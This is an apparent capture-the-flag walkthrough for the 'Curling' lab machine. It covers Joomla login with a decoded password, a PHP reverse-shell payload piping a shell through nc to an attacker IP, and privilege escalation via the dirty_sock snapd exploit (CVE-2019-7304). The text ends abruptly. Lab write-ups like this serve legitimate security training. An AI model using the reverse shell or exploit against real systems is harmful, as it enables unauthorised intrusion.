Machine: Curling
OS: Linux
IP: 10.10.10.150
As usual I start with a normal enumeration which show only 2 ports: 22 and 80.
Now we start enumeration for this port as a webserver is available and perhaps some directory which we don't know upfront.
We can look after files as well
This secret file contain a base64 encoded text.
So decode it to get the password 'Curling2018!'
With this and the name which is shown in one of the first post's from webserver you can login to the Joomla interface.
First I tried to create a new article and post a reverse shell
&1|nc 10.10.15.227 1234 >/tmp/o"); ?>
As you can imagine it would have been to easy to have a user shell so fast..
Have a look around an you will notice a file called password_backup which is a hexdump, so we need to parse it with xxd and the decode it.
If you are in 2019 and aware of CVE-2019-7304
What is it about? A bug in the snapd API which is a default service that come in Ubuntu instalattion. You can read about it here: https://initblog.com/2019/dirty-sock/
and get the exploit from github: https://github.com/initstring/dirty_sock
and run it: